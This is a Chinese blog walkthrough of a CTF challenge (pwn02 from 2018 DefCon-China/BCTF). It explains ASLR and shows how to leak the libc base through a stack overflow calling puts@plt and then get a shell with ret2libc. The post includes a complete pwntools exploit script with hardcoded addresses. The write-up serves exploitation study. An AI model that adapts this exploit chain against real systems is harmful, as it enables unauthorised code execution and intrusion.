ASLR机制及绕过策略-栈相关漏洞libc基址泄露

ASLR(地址随机化)是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。
但是,地址随机化不是对所有模块和内存区都进行随机化!虽然libc、栈、堆的加载位置被随机化,但主镜像不会

一,测试程序-2018 DefCon-China & BCTF攻防赛pwn02题第3点

程序:https://pan.baidu.com/s/1msX6qw9K0tR-CMT6K9oR_w 密码:2csu

1.查看下保护机制

看可以看到,pwn02即开启了ASLR(地址随机化)又开启了NX(栈不可执行)

2.查看libc的加载地址是否会改变

在之前的实验中,我们使用ldd命令查看关闭了ASLR保护基址的程序的libc加载地址,这次同样使用该命令查看pwn02libc文件的加载地址

我们将它运行三次,可以发现,每一此它的加载位置都是不同的,也就是说,我们不在可以通过简单的ldd命令将libc的加载地址给获取

3.运行程序


当看到input your id时,我们就可以有些想法了,啊 !是不是栈溢出啊?输入一长串字符测试下,果然报错 Segmentation fault

4.IDA打开,观察漏洞点

发现程序崩溃语句===>没有控制字符串拷贝的大小

二,利用思路

首先绕过ASLR(地址随机化),泄露出libc的基址libc_base,然后利用Ret2libc或构造ROP链绕过NX,但是要注意的是,这两步要在一次运行完成,不然因为地址随机化的缘故,在下一次运行时libc基址又将改变。

也就是说,这个溢出漏洞在一次运行中利用两次,第一次泄露libc基址,第二次利用泄露出来的libc基址获得shell

完成libc基址泄露,并使漏洞可以利用两次

常用思路:首先通过溢出返回至PLT表中,调用具有输出功能的函数(常用puts/write/printf)GOT表中的真实libc函数地址打印出来,从而分析libc基地址。然后返回至漏洞函数二次触发溢出,此时便采取正常利用思路获得shell

简单说就是:

1.获得程序调用的一个libc函数的在程序里的真实地址---------func_true_addr
2.获得这个函数在libc文件里的偏移地址---------------------------func_offset_addr
3.通过相减得到libc在程序里的加载地址----------------------libc_base = func_true_addr - func_offset_addr

__libc_start_mainlibc中的一个函数,在程序进入main的初始化工作中会被调用,为了获得它的真实地址,并可以二次利用漏洞,我们可以布局为:

布局原理:布局完成后,返回地址return_addr被覆盖为puts@plt地址,当运行到原返回地址位置时,会跳转到puts中执行,同时,esp指向esp+4,这时对puts来说,它内部的ret(返回地址)执行时esp指针还是指向esp+4的,也就是esp + 4(main)就是puts函数的返回地址,而esp+8(__libc_start_main@got.plt)则是它的参数。

流程:当调用puts时,__lic_start_main作为参数传入,这样我们就可以获得__libc_start_main在程序中的加载地址,当puts返回时会回到main函数当中,从而实现堆漏洞的二次利用。

$1,IDA查找pwn02中puts@plt

得到0x08048868

$2,IDA查找pwn02中main

得到0x080496D1

$2,IDA查找pwn02中__libc_start_main

1

2

得到0x0804BFD8

得到这些我们第一利用就可以得到libc基址libc_base,第二次只要绕过NX就可以了

在这我使用的是Ret2libc,可以参考我的另一篇文章:https://www.jianshu.com/p/c90530c910b0,我就不再赘述。

三,代码

利用这些我们写一个脚本-文件名exp.py

from pwn import *
r = process('./pwn02')

def overflow(data):
    r.recvuntil('Your choice: ')
    r.sendline('3')
    r.recvuntil('):')
    r.sendline('+')
    r.recvuntil('):')
    r.sendline('1 2')
    r.recvuntil('input your id')
    r.sendline(data)

buf = 'A' * 44
buf += p32(0x08048868)                        #puts
buf += p32(0x080496D1)                        #main
buf += p32(0x0804BFD8)                        #__libc_start_main
overflow(buf)


r.recvuntil('...\n')                                  #泄露libc基址    libc_base
leak_message = r.recv(4)
print repr(leak_message)
leak_value = u32(leak_message)
print 'leak_value is ' + hex(leak_value)
libc_base =leak_value - 0x000198B0

system_addr = libc_base + 0x0003D7E0                    #计算system()
sh_addr = libc_base + 0x0017c968                        #计算`/bin/sh`

buf = 'A' * 44                                          #ret2libc
buf += p32(system_addr)
buf += p32(0xdeadbeef)
buf += p32(sh_addr)
overflow(buf)

r.interactive()


四,测试

输入whoami,返回当前用户为root,输入ls,返回当前目录下的文件,均未报错,得到可产生交互的shell,实验完成!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,378评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,356评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,702评论 0 342
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,259评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,263评论 5 371
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,036评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,349评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,979评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,469评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,938评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,059评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,703评论 4 323
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,257评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,262评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,485评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,501评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,792评论 2 345

推荐阅读更多精彩内容